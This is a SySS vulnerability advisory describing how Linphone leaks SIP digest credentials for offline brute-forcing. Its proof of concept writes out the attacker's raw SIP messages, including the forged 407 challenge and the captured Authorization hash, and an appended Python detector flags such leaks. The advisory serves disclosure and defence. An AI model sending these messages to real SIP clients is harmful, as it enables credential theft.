Advisory ID: SYSS-2021-015
Product: Linphone
Manufacturer: Belledonne Communications
Affected Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19)
Tested Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19)
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Risk Level: Medium
Solution Status: Mitigation measures provided
Manufacturer Notification: 2021-03-26
Solution Date: 2021-09-16
Public Disclosure: 2021-10-13
CVE Reference: -
Authors of Advisory: Moritz Abrell

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linphone [1] is an open source SIP-based softphone. It provides calling,
presence and IM features.

Linphone is vulnerable to SIP digest authentication leakage, which
exposes data that can be used to brute-force the login credentials for
the extension of the Linphone SIP account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If a SIP INVITE request is sent to the SIP service of the Linphone, the
softphone rings and signals an incoming call. If the user accepts the
call and hangs up later, the softphone sends a SIP BYE request to the
caller. The caller is now able to respond with a 407 "Proxy
Authentication Required" message with authentication parameters, such as
realm and nonce value. After that, the softphone sends a new SIP BYE
request with a complete digest authentication response.

This response includes all parameters required to perform an offline
password brute-force attack against the Linphone SIP account
credentials.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Attacker sends a SIP INVITE request to the Linphone:

   INVITE sip:15@192.168.122.168:5060 SIP/2.0
   Via: SIP/2.0/UDP 192.168.122.1:5060;branch=z9hG4bK-11319
   From: ;tag=1
   To:
   Call-ID: 1-11319@192.168.122.1
   CSeq: 1 INVITE
   Contact: sip:100@192.168.122.1:5060
   Max-Forwards: 70
   Content-Type: application/sdp
   Content-Length: 137

   v=0
   o=user1 53655765 2353687637 IN IP4 192.168.122.1
   s=-
   c=IN IP4 192.168.122.1
   t=0 0
   m=audio 6000 RTP/AVP 0
   a=rtpmap:0 PCMU/8000

2. The Linphone is ringing and signals an incoming call.

3. The user accepts the call and hangs up, because of no audio.

4. The Linphone sends a BYE request to the attacker:

   BYE sip:100@192.168.122.1:5060 SIP/2.0
   Via: SIP/2.0/UDP 192.168.122.168:5060;branch=z9hG4bK.NMs4g5UQs;rport
   From: ;tag=DQUs-Xx
   To: ;tag=1
   CSeq: 111 BYE
   Call-ID: 1-11319@192.168.122.1
   Max-Forwards: 70

5. The attacker sends a 407 "Proxy Authentication Required" response
   with realm and a nonce value:

   SIP/2.0 407 Proxy Authentication Required
   Via: SIP/2.0/UDP 192.168.122.168:5060;branch=z9hG4bK.NMs4g5UQs;rport
   From: ;tag=DQUs-Xx
   To: ;tag=1
   Call-ID: 1-11319@192.168.122.1
   CSeq: 111 BYE
   WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="69d327e5"
   Content-Length: 0

6. Linphone sends a second BYE request with an "Authorization" header:

   BYE sip:100@192.168.122.1:5060 SIP/2.0
   Via: SIP/2.0/UDP 192.168.122.168:5060;branch=z9hG4bK.NMs4g5UQs;rport
   From: ;tag=DQUs-Xx
   To: ;tag=1
   Call-ID: 1-11319@192.168.122.1
   CSeq: 112 BYE
   Max-Forwards: 70
   Authorization: Digest realm="asterisk", nonce="69d327e5", algorithm=MD5, username="123", uri="sip:100@192.168.122.1:5060", response="e2e71ebf70ea859426afcfbc7be4b6b3"

The attacker is now able to perform an offline password brute-force
attack against the SIP account of Linphone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer implemented mitigation measures in commit
742334647fcde614c4126834fa9f59931efb2d59 in the public GitHub repository.
Nevertheless, the use of individual and strong passwords is essential
and strongly recommended for reducing the success rate of offline
password guessing attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-03-26: Vulnerability reported to manufacturer
2021-04-01: Renewed notification to the manufacturer due to lack of feedback
2021-04-07: Renewed notification to the manufacturer due to lack of feedback
2021-05-17: Renewed notification to the manufacturer due to lack of feedback
2021-05-17: Response and confirmation of the vulnerabilities by the manufacturer
2021-09-16: Mitigation measures provided by the manufacturer

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1]: Product website for Linphone:
     https://www.linphone.org/
[2]: SySS Responsible Disclosure Policy:
     https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
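
Added example (not part of the SySS advisory or of the Linphone code): a Python check over captured SIP traffic that flags digest credentials sent to any host other than the account's own registrar, which is the leak shown in step 6 of the PoC. The trusted proxy address 192.168.122.10, the REGISTER message and all function names are assumptions constructed for this example.

```python
import re

# Assumption: the account's registrar/proxy (constructed address, not from the advisory).
TRUSTED_PROXIES = {"192.168.122.10"}

# Constructed capture (src, dst, message): PoC steps 5-6 trimmed, plus a benign REGISTER.
CAPTURE = [
    ("192.168.122.1", "192.168.122.168",
     "SIP/2.0 407 Proxy Authentication Required\r\nCall-ID: 1-11319@192.168.122.1\r\n"
     'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="69d327e5"\r\n\r\n'),
    ("192.168.122.168", "192.168.122.1",
     "BYE sip:100@192.168.122.1:5060 SIP/2.0\r\nCall-ID: 1-11319@192.168.122.1\r\n"
     'Authorization: Digest realm="asterisk", nonce="69d327e5", algorithm=MD5, '
     'username="123", uri="sip:100@192.168.122.1:5060", '
     'response="e2e71ebf70ea859426afcfbc7be4b6b3"\r\n\r\n'),
    ("192.168.122.168", "192.168.122.10",
     "REGISTER sip:192.168.122.10 SIP/2.0\r\nCall-ID: reg-1@192.168.122.168\r\n"
     'Authorization: Digest realm="asterisk", nonce="aa11bb22", username="123", '
     'uri="sip:192.168.122.10", response="00000000000000000000000000000000"\r\n\r\n'),
]

def parse(raw):
    """Return (start line, lower-cased header dict) for one SIP message."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    return lines[0], {k.strip().lower(): v.strip()
                      for k, _, v in (ln.partition(":") for ln in lines[1:])}

def digest_params(value):
    """Extract key=value pairs from a Digest challenge or credentials header."""
    return dict(re.findall(r'(\w+)="?([^",]+)"?', value))

def find_leaks(capture, trusted):
    """Flag requests that carry digest credentials to a host outside `trusted`."""
    challenged, alerts = {}, []  # challenged: Call-ID -> nonce from an untrusted peer
    for src, dst, raw in capture:
        start, h = parse(raw)
        if start.startswith("SIP/2.0 "):  # a response: remember untrusted challenges
            chal = h.get("www-authenticate") or h.get("proxy-authenticate")
            if start.split()[1] in ("401", "407") and chal and src not in trusted:
                challenged[h.get("call-id")] = digest_params(chal).get("nonce")
            continue
        cred = h.get("authorization") or h.get("proxy-authorization")
        if cred and dst not in trusted:
            p = digest_params(cred)  # the response hash is deliberately not copied
            hit = p.get("nonce") and challenged.get(h.get("call-id")) == p["nonce"]
            alerts.append({"method": start.split()[0], "dst": dst,
                           "username": p.get("username"), "realm": p.get("realm"),
                           "answers_untrusted_challenge": bool(hit)})
    return alerts
```

Run over the capture, `find_leaks(CAPTURE, TRUSTED_PROXIES)` reports only the authenticated BYE to 192.168.122.1; the REGISTER to the trusted proxy is not flagged.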